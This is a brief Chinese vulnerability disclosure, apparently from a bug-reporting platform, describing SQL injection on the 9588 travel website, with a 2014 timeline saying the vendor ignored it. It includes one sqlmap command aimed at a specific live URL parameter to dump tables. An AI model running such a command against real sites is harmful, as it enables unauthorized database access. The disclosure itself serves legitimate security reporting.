漏洞详情

披露状态:

2014-09-27: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-11-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

9588旅行网存在sqlmap注入漏洞

详细说明:

9588旅行网存在sqlmap注入漏洞。
用sqlmap注入

漏洞证明:

python sqlmap.py -u http://www.9588.com/default.aspx?cooperateid=92545 --tables


捕获.PNG


遍历数据库

捕获.PNG


遍历字段

捕获.PNG


数据

捕获.PNG


修复方案:

标签: none

评论已关闭